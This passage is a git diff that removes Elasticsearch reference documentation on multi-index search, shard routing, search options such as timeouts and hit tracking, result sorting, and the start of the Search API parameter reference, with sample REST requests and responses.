/my-index-000001,my-index-000002/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\n/] - -You can also search multiple data streams and indices using an index pattern. - -The following request targets the `my-index-*` index pattern. The request -searches any data streams or indices in the cluster that start with `my-index-`. - -[source,console] ----- -GET /my-index-*/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -To search all data streams and indices in a cluster, omit the target from the -request path. Alternatively, you can use `_all` or `*`. - -The following requests are equivalent and search all data streams and indices in -the cluster. - -[source,console] ----- -GET /_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} - -GET /_all/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} - -GET /*/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -[discrete] -[[index-boost]] -=== Index boost - -When searching multiple indices, you can use the `indices_boost` parameter to -boost results from one or more specified indices. This is useful when hits -coming from some indices matter more than hits from other. - -NOTE: You cannot use `indices_boost` with data streams. - -[source,console] --------------------------------------------------- -GET /_search -{ - "indices_boost": [ - { "my-index-000001": 1.4 }, - { "my-index-000002": 1.3 } - ] -} --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -Index aliases and index patterns can also be used: - -[source,console] --------------------------------------------------- -GET /_search -{ - "indices_boost": [ - { "my-alias": 1.4 }, - { "my-index*": 1.3 } - ] -} --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000001\/_alias\/my-alias\n/] - -If multiple matches are found, the first match will be used. For example, if an -index is included in `alias1` and matches the `my-index*` pattern, a boost value -of `1.4` is applied. \ No newline at end of file diff --git a/docs/reference/search/search-your-data/search-shard-routing.asciidoc b/docs/reference/search/search-your-data/search-shard-routing.asciidoc deleted file mode 100644 index b0286986df7..00000000000 --- a/docs/reference/search/search-your-data/search-shard-routing.asciidoc +++ /dev/null @@ -1,184 +0,0 @@ -[[search-shard-routing]] -== Search shard routing - -To protect against hardware failure and increase search capacity, {es} can store -copies of an index's data across multiple shards on multiple nodes. When running -a search request, {es} selects a node containing a copy of the index's data and -forwards the search request to that node's shards. This process is known as -_search shard routing_ or _routing_. - -[discrete] -[[search-adaptive-replica]] -=== Adaptive replica selection - -By default, {es} uses _adaptive replica selection_ to route search requests. -This method selects an eligible node using <> and the following criteria: - -* Response time of prior requests between the coordinating node -and the eligible node -* How long the eligible node took to run previous searches -* Queue size of the eligible node's `search` <> - -Adaptive replica selection is designed to decrease search latency. However, you -can disable adaptive replica selection by setting -`cluster.routing.use_adaptive_replica_selection` to `false` using the -<>. If disabled, {es} routes -search requests using a round-robin method, which may result in slower searches. - -[discrete] -[[shard-and-node-preference]] -=== Set a preference - -By default, adaptive replica selection chooses from all eligible nodes and -shards. However, you may only want data from a local node or want to route -searches to a specific node based on its hardware. Or you may want to send -repeated searches to the same shard to take advantage of caching. - -To limit the set of nodes and shards eligible for a search request, use -the search API's <> query parameter. - -For example, the following request searches `my-index-000001` with a -`preference` of `_local`. This restricts the search to shards on the -local node. If the local node contains no shard copies of the index's data, the -request uses adaptive replica selection to another eligible node -as a fallback. - -[source,console] ----- -GET /my-index-000001/_search?preference=_local -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -You can also use the `preference` parameter to route searches to specific shards -based on a provided string. If the cluster state and selected shards -do not change, searches using the same `preference` string are routed to the -same shards in the same order. - -We recommend using a unique `preference` string, such as a user name or web -session ID. This string cannot start with a `_`. - -TIP: You can use this option to serve cached results for frequently used and -resource-intensive searches. If the shard's data doesn't change, repeated -searches with the same `preference` string retrieve results from the same -<>. For time series use cases, such as -logging, data in older indices is rarely updated and can be served directly from -this cache. - -The following request searches `my-index-000001` with a `preference` string of -`my-custom-shard-string`. - -[source,console] ----- -GET /my-index-000001/_search?preference=my-custom-shard-string -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -NOTE: If the cluster state or selected shards change, the same `preference` -string may not route searches to the same shards in the same order. This can -occur for a number of reasons, including shard relocations and shard failures. A -node can also reject a search request, which {es} would re-route to another -node. - -[discrete] -[[search-routing]] -=== Use a routing value - -When you index a document, you can specify an optional -<>, which routes the document to a -specific shard. - -For example, the following indexing request routes a document using -`my-routing-value`. - -[source,console] ----- -POST /my-index-000001/_doc?routing=my-routing-value -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} ----- - -You can use the same routing value in the search API's `routing` query -parameter. This ensures the search runs on the same shard used to index the -document. - -[source,console] ----- -GET /my-index-000001/_search?routing=my-routing-value -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -You can also provide multiple comma-separated routing values: - -[source,console] ----- -GET /my-index-000001/_search?routing=my-routing-value,my-routing-value-2 -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -[discrete] -[[search-concurrency-and-parallelism]] -=== Search concurrency and parallelism - -By default, {es} doesn't reject search requests based on the number of shards -the request hits. However, hitting a large number of shards can significantly -increase CPU and memory usage. - -TIP: For tips on preventing indices with large numbers of shards, see -<>. - -You can use the `max_concurrent_shard_requests` query parameter to control -maximum number of concurrent shards a search request can hit per node. This -prevents a single request from overloading a cluster. The parameter defaults to -a maximum of `5`. - -[source,console] ----- -GET /my-index-000001/_search?max_concurrent_shard_requests=3 -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -You can also use the `action.search.shard_count.limit` cluster setting to set a -search shard limit and reject requests that hit too many shards. You can -configure `action.search.shard_count.limit` using the -<>. \ No newline at end of file diff --git a/docs/reference/search/search-your-data/search-your-data.asciidoc b/docs/reference/search/search-your-data/search-your-data.asciidoc deleted file mode 100644 index 0d72145c6a0..00000000000 --- a/docs/reference/search/search-your-data/search-your-data.asciidoc +++ /dev/null @@ -1,459 +0,0 @@ -[[search-your-data]] -= Search your data - -[[search-query]] -A _search query_, or _query_, is a request for information about data in -{es} data streams or indices. - -You can think of a query as a question, written in a way {es} understands. -Depending on your data, you can use a query to get answers to questions like: - -* What processes on my server take longer than 500 milliseconds to respond? -* What users on my network ran `regsvr32.exe` within the last week? -* What pages on my website contain a specific word or phrase? - -A _search_ consists of one or more queries that are combined and sent to {es}. -Documents that match a search's queries are returned in the _hits_, or -_search results_, of the response. - -A search may also contain additional information used to better process its -queries. For example, a search may be limited to a specific index or only return -a specific number of results. - -[discrete] -[[run-an-es-search]] -== Run a search - -You can use the <> to search and -<> data stored in {es} data streams or indices. -The API's `query` request body parameter accepts queries written in -<>. - -The following request searches `my-index-000001` using a -<> query. This query matches documents with a -`user.id` value of `kimchy`. - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -The API response returns the top 10 documents matching the query in the -`hits.hits` property. - -[source,console-result] ----- -{ - "took": 5, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.3862942, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "kxWFcnMByiguvud1Z8vC", - "_score": 1.3862942, - "_source": { - "@timestamp": "2099-11-15T14:12:12", - "http": { - "request": { - "method": "get" - }, - "response": { - "bytes": 1070000, - "status_code": 200 - }, - "version": "1.1" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "source": { - "ip": "127.0.0.1" - }, - "user": { - "id": "kimchy" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 5/"took": "$body.took"/] -// TESTRESPONSE[s/"_id": "kxWFcnMByiguvud1Z8vC"/"_id": "$body.hits.hits.0._id"/] - -[discrete] -[[common-search-options]] -=== Common search options - -You can use the following options to customize your searches. - -*Query DSL* + -<> supports a variety of query types you can mix and match -to get the results you want. Query types include: - -* <> and other <>, which let you combine queries and match results based on multiple -criteria -* <> for filtering and finding exact matches -* <>, which are commonly used in search -engines -* <> and <> - -*Aggregations* + -You can use <> to get statistics and -other analytics for your search results. Aggregations help you answer questions -like: - -* What's the average response time for my servers? -* What are the top IP addresses hit by users on my network? -* What is the total transaction revenue by customer? - -*Search multiple data streams and indices* + -You can use comma-separated values and grep-like index patterns to search -several data streams and indices in the same request. You can even boost search -results from specific indices. See <>. - -*Paginate search results* + -By default, searches return only the top 10 matching hits. To retrieve -more or fewer documents, see <>. - -*Retrieve selected fields* + -The search response's `hit.hits` property includes the full document -<> for each hit. To retrieve only a subset of -the `_source` or other fields, see <>. - -*Sort search results* + -By default, search hits are sorted by `_score`, a <> that measures how well each document matches the query. To customize the -calculation of these scores, use the -<> query. To sort search hits by -other field values, see <>. - -*Run an async search* + -{es} searches are designed to run on large volumes of data quickly, often -returning results in milliseconds. For this reason, searches are -_synchronous_ by default. The search request waits for complete results before -returning a response. - -However, complete results can take longer for searches across -<> or <>. - -To avoid long waits, you can run an _asynchronous_, or _async_, search -instead. An <> lets you retrieve partial -results for a long-running search now and get complete results later. - -[discrete] -[[search-timeout]] -=== Search timeout - -By default, search requests don't time out. The request waits for complete -results before returning a response. - -While <> is designed for long-running -searches, you can also use the `timeout` parameter to specify a duration you'd -like to wait for a search to complete. If no response is received before this -period ends, the request fails and returns an error. - -[source,console] ----- -GET /my-index-000001/_search -{ - "timeout": "2s", - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -To set a cluster-wide default timeout for all search requests, configure -`search.default_search_timeout` using the <>. This global timeout duration is used if no `timeout` argument is -passed in the request. If the global search timeout expires before the search -request finishes, the request is cancelled using <>. The `search.default_search_timeout` setting defaults to `-1` (no -timeout). - -[discrete] -[[global-search-cancellation]] -=== Search cancellation - -You can cancel a search request using the <>. {es} also automatically cancels a search request when your client's HTTP -connection closes. We recommend you set up your client to close HTTP connections -when a search request is aborted or times out. - -[discrete] -[[track-total-hits]] -=== Track total hits - -Generally the total hit count can't be computed accurately without visiting all -matches, which is costly for queries that match lots of documents. The -`track_total_hits` parameter allows you to control how the total number of hits -should be tracked. -Given that it is often enough to have a lower bound of the number of hits, -such as "there are at least 10000 hits", the default is set to `10,000`. -This means that requests will count the total hit accurately up to `10,000` hits. -It is a good trade off to speed up searches if you don't need the accurate number -of hits after a certain threshold. - -When set to `true` the search response will always track the number of hits that -match the query accurately (e.g. `total.relation` will always be equal to `"eq"` -when `track_total_hits` is set to true). Otherwise the `"total.relation"` returned -in the `"total"` object in the search response determines how the `"total.value"` -should be interpreted. A value of `"gte"` means that the `"total.value"` is a -lower bound of the total hits that match the query and a value of `"eq"` indicates -that `"total.value"` is the accurate count. - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "track_total_hits": true, - "query": { - "match" : { - "user.id" : "elkbee" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -\... returns: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "timed_out": false, - "took": 100, - "hits": { - "max_score": 1.0, - "total" : { - "value": 2048, <1> - "relation": "eq" <2> - }, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 100/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 1\.0/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"value": 2048/"value": $body.hits.total.value/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": "$body.hits.hits"/] - -<1> The total number of hits that match the query. -<2> The count is accurate (e.g. `"eq"` means equals). - -It is also possible to set `track_total_hits` to an integer. -For instance the following query will accurately track the total hit count that match -the query up to 100 documents: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "track_total_hits": 100, - "query": { - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[continued] - -The `hits.total.relation` in the response will indicate if the -value returned in `hits.total.value` is accurate (`"eq"`) or a lower -bound of the total (`"gte"`). - -For instance the following response: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "timed_out": false, - "took": 30, - "hits": { - "max_score": 1.0, - "total": { - "value": 42, <1> - "relation": "eq" <2> - }, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 30/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 1\.0/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"value": 42/"value": $body.hits.total.value/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": "$body.hits.hits"/] - -<1> 42 documents match the query -<2> and the count is accurate (`"eq"`) - -\... indicates that the number of hits returned in the `total` -is accurate. - -If the total number of hits that match the query is greater than the -value set in `track_total_hits`, the total hits in the response -will indicate that the returned value is a lower bound: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits": { - "max_score": 1.0, - "total": { - "value": 100, <1> - "relation": "gte" <2> - }, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[skip:response is already tested in the previous snippet] - -<1> There are at least 100 documents that match the query -<2> This is a lower bound (`"gte"`). - -If you don't need to track the total number of hits at all you can improve query -times by setting this option to `false`: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "track_total_hits": false, - "query": { - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[continued] - -\... returns: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "timed_out": false, - "took": 10, - "hits": { <1> - "max_score": 1.0, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 10/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 1\.0/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": "$body.hits.hits"/] - -<1> The total number of hits is unknown. - -Finally you can force an accurate count by setting `"track_total_hits"` -to `true` in the request. - -[discrete] -[[quickly-check-for-matching-docs]] -=== Quickly check for matching docs - -If you only want to know if there are any documents matching a -specific query, you can set the `size` to `0` to indicate that we are not -interested in the search results. You can also set `terminate_after` to `1` -to indicate that the query execution can be terminated whenever the first -matching document was found (per shard). - -[source,console] --------------------------------------------------- -GET /_search?q=user.id:elkbee&size=0&terminate_after=1 --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: `terminate_after` is always applied **after** the -<> and stops the query as well as the aggregation -executions when enough hits have been collected on the shard. Though the doc -count on aggregations may not reflect the `hits.total` in the response since -aggregations are applied **before** the post filtering. - -The response will not contain any hits as the `size` was set to `0`. The -`hits.total` will be either equal to `0`, indicating that there were no -matching documents, or greater than `0` meaning that there were at least -as many documents matching the query when it was early terminated. -Also if the query was terminated early, the `terminated_early` flag will -be set to `true` in the response. - -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "terminated_early": true, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": null, - "hits": [] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3/"took": $body.took/] - - -The `took` time in the response contains the milliseconds that this request -took for processing, beginning quickly after the node received the query, up -until all search related work is done and before the above JSON is returned -to the client. This means it includes the time spent waiting in thread pools, -executing a distributed search across the whole cluster and gathering all the -results. - -include::collapse-search-results.asciidoc[] -include::filter-search-results.asciidoc[] -include::highlighting.asciidoc[] -include::long-running-searches.asciidoc[] -include::near-real-time.asciidoc[] -include::paginate-search-results.asciidoc[] -include::retrieve-inner-hits.asciidoc[] -include::retrieve-selected-fields.asciidoc[] -include::search-across-clusters.asciidoc[] -include::search-multiple-indices.asciidoc[] -include::search-shard-routing.asciidoc[] -include::sort-search-results.asciidoc[] diff --git a/docs/reference/search/search-your-data/sort-search-results.asciidoc b/docs/reference/search/search-your-data/sort-search-results.asciidoc deleted file mode 100644 index 25af92c7d63..00000000000 --- a/docs/reference/search/search-your-data/sort-search-results.asciidoc +++ /dev/null @@ -1,640 +0,0 @@ -[[sort-search-results]] -== Sort search results - -Allows you to add one or more sorts on specific fields. Each sort can be -reversed as well. The sort is defined on a per field level, with special -field name for `_score` to sort by score, and `_doc` to sort by index order. - -Assuming the following index mapping: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "post_date": { "type": "date" }, - "user": { - "type": "keyword" - }, - "name": { - "type": "keyword" - }, - "age": { "type": "integer" } - } - } -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "sort" : [ - { "post_date" : {"order" : "asc"}}, - "user", - { "name" : "desc" }, - { "age" : "desc" }, - "_score" - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: `_doc` has no real use-case besides being the most efficient sort order. -So if you don't care about the order in which documents are returned, then you -should sort by `_doc`. This especially helps when <>. - -[discrete] -=== Sort Values - -The sort values for each document returned are also returned as part of -the response. - -[discrete] -=== Sort Order - -The `order` option can have the following values: - -[horizontal] -`asc`:: Sort in ascending order -`desc`:: Sort in descending order - -The order defaults to `desc` when sorting on the `_score`, and defaults -to `asc` when sorting on anything else. - -[discrete] -=== Sort mode option - -Elasticsearch supports sorting by array or multi-valued fields. The `mode` option -controls what array value is picked for sorting the document it belongs -to. The `mode` option can have the following values: - -[horizontal] -`min`:: Pick the lowest value. -`max`:: Pick the highest value. -`sum`:: Use the sum of all values as sort value. Only applicable for - number based array fields. -`avg`:: Use the average of all values as sort value. Only applicable - for number based array fields. -`median`:: Use the median of all values as sort value. Only applicable - for number based array fields. - -The default sort mode in the ascending sort order is `min` -- the lowest value -is picked. The default sort mode in the descending order is `max` -- -the highest value is picked. - -[discrete] -==== Sort mode example usage - -In the example below the field price has multiple prices per document. -In this case the result hits will be sorted by price ascending based on -the average price per document. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1?refresh -{ - "product": "chocolate", - "price": [20, 4] -} - -POST /_search -{ - "query" : { - "term" : { "product" : "chocolate" } - }, - "sort" : [ - {"price" : {"order" : "asc", "mode" : "avg"}} - ] -} --------------------------------------------------- - -[discrete] -=== Sorting numeric fields - -For numeric fields it is also possible to cast the values from one type -to another using the `numeric_type` option. -This option accepts the following values: [`"double", "long", "date", "date_nanos"`] -and can be useful for searches across multiple data streams or indices where the sort field is mapped differently. - -Consider for instance these two indices: - -[source,console] --------------------------------------------------- -PUT /index_double -{ - "mappings": { - "properties": { - "field": { "type": "double" } - } - } -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -PUT /index_long -{ - "mappings": { - "properties": { - "field": { "type": "long" } - } - } -} --------------------------------------------------- -// TEST[continued] - -Since `field` is mapped as a `double` in the first index and as a `long` -in the second index, it is not possible to use this field to sort requests -that query both indices by default. However you can force the type to one -or the other with the `numeric_type` option in order to force a specific -type for all indices: - -[source,console] --------------------------------------------------- -POST /index_long,index_double/_search -{ - "sort" : [ - { - "field" : { - "numeric_type" : "double" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -In the example above, values for the `index_long` index are casted to -a double in order to be compatible with the values produced by the -`index_double` index. -It is also possible to transform a floating point field into a `long` -but note that in this case floating points are replaced by the largest -value that is less than or equal (greater than or equal if the value -is negative) to the argument and is equal to a mathematical integer. - -This option can also be used to convert a `date` field that uses millisecond -resolution to a `date_nanos` field with nanosecond resolution. -Consider for instance these two indices: - -[source,console] --------------------------------------------------- -PUT /index_double -{ - "mappings": { - "properties": { - "field": { "type": "date" } - } - } -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -PUT /index_long -{ - "mappings": { - "properties": { - "field": { "type": "date_nanos" } - } - } -} --------------------------------------------------- -// TEST[continued] - -Values in these indices are stored with different resolutions so sorting on these -fields will always sort the `date` before the `date_nanos` (ascending order). -With the `numeric_type` type option it is possible to set a single resolution for -the sort, setting to `date` will convert the `date_nanos` to the millisecond resolution -while `date_nanos` will convert the values in the `date` field to the nanoseconds resolution: - -[source,console] --------------------------------------------------- -POST /index_long,index_double/_search -{ - "sort" : [ - { - "field" : { - "numeric_type" : "date_nanos" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -[WARNING] -To avoid overflow, the conversion to `date_nanos` cannot be applied on dates before -1970 and after 2262 as nanoseconds are represented as longs. - -[discrete] -[[nested-sorting]] -=== Sorting within nested objects. - -Elasticsearch also supports sorting by -fields that are inside one or more nested objects. The sorting by nested -field support has a `nested` sort option with the following properties: - -`path`:: - Defines on which nested object to sort. The actual - sort field must be a direct field inside this nested object. - When sorting by nested field, this field is mandatory. - -`filter`:: - A filter that the inner objects inside the nested path - should match with in order for its field values to be taken into account - by sorting. Common case is to repeat the query / filter inside the - nested filter or query. By default no `nested_filter` is active. -`max_children`:: - The maximum number of children to consider per root document - when picking the sort value. Defaults to unlimited. -`nested`:: - Same as top-level `nested` but applies to another nested path within the - current nested object. - -[WARNING] -.Nested sort options before Elasticsearch 6.1 -============================================ - -The `nested_path` and `nested_filter` options have been deprecated in -favor of the options documented above. - -============================================ - -[discrete] -==== Nested sorting examples - -In the below example `offer` is a field of type `nested`. -The nested `path` needs to be specified; otherwise, Elasticsearch doesn't know on what nested level sort values need to be captured. - -[source,console] --------------------------------------------------- -POST /_search -{ - "query" : { - "term" : { "product" : "chocolate" } - }, - "sort" : [ - { - "offer.price" : { - "mode" : "avg", - "order" : "asc", - "nested": { - "path": "offer", - "filter": { - "term" : { "offer.color" : "blue" } - } - } - } - } - ] -} --------------------------------------------------- - -In the below example `parent` and `child` fields are of type `nested`. -The `nested_path` needs to be specified at each level; otherwise, Elasticsearch doesn't know on what nested level sort values need to be captured. - -[source,console] --------------------------------------------------- -POST /_search -{ - "query": { - "nested": { - "path": "parent", - "query": { - "bool": { - "must": {"range": {"parent.age": {"gte": 21}}}, - "filter": { - "nested": { - "path": "parent.child", - "query": {"match": {"parent.child.name": "matt"}} - } - } - } - } - } - }, - "sort" : [ - { - "parent.child.age" : { - "mode" : "min", - "order" : "asc", - "nested": { - "path": "parent", - "filter": { - "range": {"parent.age": {"gte": 21}} - }, - "nested": { - "path": "parent.child", - "filter": { - "match": {"parent.child.name": "matt"} - } - } - } - } - } - ] -} --------------------------------------------------- - -Nested sorting is also supported when sorting by -scripts and sorting by geo distance. - -[discrete] -=== Missing Values - -The `missing` parameter specifies how docs which are missing -the sort field should be treated: The `missing` value can be -set to `_last`, `_first`, or a custom value (that -will be used for missing docs as the sort value). -The default is `_last`. - -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { "price" : {"missing" : "_last"} } - ], - "query" : { - "term" : { "product" : "chocolate" } - } -} --------------------------------------------------- - -NOTE: If a nested inner object doesn't match with -the `nested_filter` then a missing value is used. - -[discrete] -=== Ignoring Unmapped Fields - -By default, the search request will fail if there is no mapping -associated with a field. The `unmapped_type` option allows you to ignore -fields that have no mapping and not sort by them. The value of this -parameter is used to determine what sort values to emit. Here is an -example of how it can be used: - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { "price" : {"unmapped_type" : "long"} } - ], - "query" : { - "term" : { "product" : "chocolate" } - } -} --------------------------------------------------- - -If any of the indices that are queried doesn't have a mapping for `price` -then Elasticsearch will handle it as if there was a mapping of type -`long`, with all documents in this index having no value for this field. - -[discrete] -[[geo-sorting]] -=== Geo Distance Sorting - -Allow to sort by `_geo_distance`. Here is an example, assuming `pin.location` is a field of type `geo_point`: - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { - "_geo_distance" : { - "pin.location" : [-70, 40], - "order" : "asc", - "unit" : "km", - "mode" : "min", - "distance_type" : "arc", - "ignore_unmapped": true - } - } - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - - - -`distance_type`:: - - How to compute the distance. Can either be `arc` (default), or `plane` (faster, but inaccurate on long distances and close to the poles). - -`mode`:: - - What to do in case a field has several geo points. By default, the shortest - distance is taken into account when sorting in ascending order and the - longest distance when sorting in descending order. Supported values are - `min`, `max`, `median` and `avg`. - -`unit`:: - - The unit to use when computing sort values. The default is `m` (meters). - - -`ignore_unmapped`:: - - Indicates if the unmapped field should be treated as a missing value. Setting it to `true` is equivalent to specifying - an `unmapped_type` in the field sort. The default is `false` (unmapped field cause the search to fail). - -NOTE: geo distance sorting does not support configurable missing values: the -distance will always be considered equal to +Infinity+ when a document does not -have values for the field that is used for distance computation. - -The following formats are supported in providing the coordinates: - -[discrete] -==== Lat Lon as Properties - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { - "_geo_distance" : { - "pin.location" : { - "lat" : 40, - "lon" : -70 - }, - "order" : "asc", - "unit" : "km" - } - } - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -[discrete] -==== Lat Lon as String - -Format in `lat,lon`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": "40,-70", - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -[discrete] -==== Geohash - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": "drm3btev3e86", - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -[discrete] -==== Lat Lon as Array - -Format in `[lon, lat]`, note, the order of lon/lat here in order to -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": [ -70, 40 ], - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -[discrete] -=== Multiple reference points - -Multiple geo points can be passed as an array containing any `geo_point` format, for example - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": [ [ -70, 40 ], [ -71, 42 ] ], - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -and so forth. - -The final distance for a document will then be `min`/`max`/`avg` (defined via `mode`) distance of all points contained in the document to all points given in the sort request. - - -[discrete] -=== Script Based Sorting - -Allow to sort based on custom scripts, here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "term": { "user": "kimchy" } - }, - "sort": { - "_script": { - "type": "number", - "script": { - "lang": "painless", - "source": "doc['field_name'].value * params.factor", - "params": { - "factor": 1.1 - } - }, - "order": "asc" - } - } -} --------------------------------------------------- - -[discrete] -=== Track Scores - -When sorting on a field, scores are not computed. By setting -`track_scores` to true, scores will still be computed and tracked. - -[source,console] --------------------------------------------------- -GET /_search -{ - "track_scores": true, - "sort" : [ - { "post_date" : {"order" : "desc"} }, - { "name" : "desc" }, - { "age" : "desc" } - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -[discrete] -=== Memory Considerations - -When sorting, the relevant sorted field values are loaded into memory. -This means that per shard, there should be enough memory to contain -them. For string based types, the field sorted on should not be analyzed -/ tokenized. For numeric types, if possible, it is recommended to -explicitly set the type to narrower types (like `short`, `integer` and -`float`). diff --git a/docs/reference/search/search.asciidoc b/docs/reference/search/search.asciidoc deleted file mode 100644 index 853b6f57582..00000000000 --- a/docs/reference/search/search.asciidoc +++ /dev/null @@ -1,720 +0,0 @@ -[[search-search]] -=== Search API -++++ -Search -++++ - -Returns search hits that match the query defined in the request. - -[source,console] ----- -GET /my-index-000001/_search ----- -// TEST[setup:my_index] - -[[search-search-api-request]] -==== {api-request-title} - -`GET //_search` - -`GET /_search` - -`POST //_search` - -`POST /_search` - -[[search-search-api-desc]] -==== {api-description-title} - -Allows you to execute a search query and get back search hits that match the -query. You can provide search queries using the <> or <>. - -[[search-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[role="child_attributes"] -[[search-search-api-query-params]] -==== {api-query-parms-title} - -IMPORTANT: Several options for this API can be specified using a query parameter -or a request body parameter. If both parameters are specified, only the query -parameter is used. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -[[search-partial-responses]] -`allow_partial_search_results`:: -(Optional, Boolean) -If `true`, returns partial results if there are request timeouts or -<>. If `false`, returns an error with -no partial results. Defaults to `true`. -+ -To override the default for this field, set the -`search.default_allow_partial_results` cluster setting to `false`. - -`batched_reduce_size`:: -(Optional, integer) The number of shard results that should be reduced at once -on the coordinating node. This value should be used as a protection mechanism -to reduce the memory overhead per search request if the potential number of -shards in the request can be large. Defaults to `512`. - -[[ccs-minimize-roundtrips]] -`ccs_minimize_roundtrips`:: -(Optional, Boolean) If `true`, network round-trips between the -coordinating node and the remote clusters are minimized when executing -{ccs} (CCS) requests. See <>. Defaults to `true`. - -`docvalue_fields`:: -(Optional, string) A comma-separated list of fields to return as the docvalue -representation of a field for each hit. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`explain`:: -(Optional, Boolean) If `true`, returns detailed information about score -computation as part of a hit. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`ignore_throttled`:: -(Optional, Boolean) If `true`, concrete, expanded or aliased indices will be -ignored when 